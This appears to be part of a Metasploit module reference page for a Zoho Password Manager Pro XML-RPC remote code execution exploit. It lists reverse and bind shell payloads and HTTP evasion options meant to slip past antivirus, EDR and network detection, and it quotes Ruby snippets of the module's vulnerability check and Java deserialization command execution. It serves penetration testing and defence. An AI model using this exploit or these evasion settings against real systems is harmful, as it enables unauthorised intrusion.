   288  payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps                               normal  No     Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)
   289  payload/cmd/windows/powershell_bind_tcp                                                     normal  No     Windows Interactive Powershell Session, Bind TCP
   290  payload/cmd/windows/powershell_reverse_tcp                                                  normal  No     Windows Interactive Powershell Session, Reverse TCP
   291  payload/cmd/windows/powershell_reverse_tcp_ssl                                              normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
   292  payload/cmd/windows/reverse_lua                                                             normal  No     Windows Command Shell, Reverse TCP (via Lua)
   293  payload/cmd/windows/reverse_perl                                                            normal  No     Windows Command, Double Reverse TCP Connection (via Perl)
   294  payload/cmd/windows/reverse_powershell                                                      normal  No     Windows Command Shell, Reverse TCP (via Powershell)
   295  payload/cmd/windows/reverse_ruby                                                            normal  No     Windows Command Shell, Reverse TCP (via Ruby)
   296  payload/generic/custom                                                                      normal  No     Custom Payload
   297  payload/generic/shell_bind_tcp                                                              normal  No     Generic Command Shell, Bind TCP Inline
   298  payload/generic/shell_reverse_tcp                                                           normal  No     Generic Command Shell, Reverse TCP Inline
   299  payload/generic/ssh/interact                                                                normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the windows/http/zoho_password_manager_pro_xml_rpc_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, defl
                                                            ate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target did not respond to check.


Here is a relevant code snippet related to the "Target did not respond to check." error message:

87:	  def check
88:	    # Send an empty serialized object
89:	    res = send_request_xmlrpc('')
90:	
91:	    unless res
92:	      return CheckCode::Unknown('Target did not respond to check.')
93:	    end
94:	
95:	    if res.body.include?('Failed to read result object: null')
96:	      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
97:	    end

Target can deserialize arbitrary data.


Here is a relevant code snippet related to the "Target can deserialize arbitrary data." error message:

91:	    unless res
92:	      return CheckCode::Unknown('Target did not respond to check.')
93:	    end
94:	
95:	    if res.body.include?('Failed to read result object: null')
96:	      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
97:	    end
98:	
99:	    CheckCode::Safe('Target cannot deserialize arbitrary data.')
100:	  end
101:	

Target cannot deserialize arbitrary data.


Here is a relevant code snippet related to the "Target cannot deserialize arbitrary data." error message:

94:	
95:	    if res.body.include?('Failed to read result object: null')
96:	      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
97:	    end
98:	
99:	    CheckCode::Safe('Target cannot deserialize arbitrary data.')
100:	  end
101:	
102:	  def exploit
103:	    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
104:	    case target['Type']

Failed to execute command: <CMD>


Here is a relevant code snippet related to the "Failed to execute command: <CMD>" error message:

118:	    res = send_request_xmlrpc(
119:	      generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)
120:	    )
121:	
122:	    unless res && res.code == 200
123:	      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
124:	    end
125:	
126:	    print_good("Successfully executed command: #{cmd}")
127:	  end
128:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Vinicius
  • Y4er
  • Grant Willcox

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.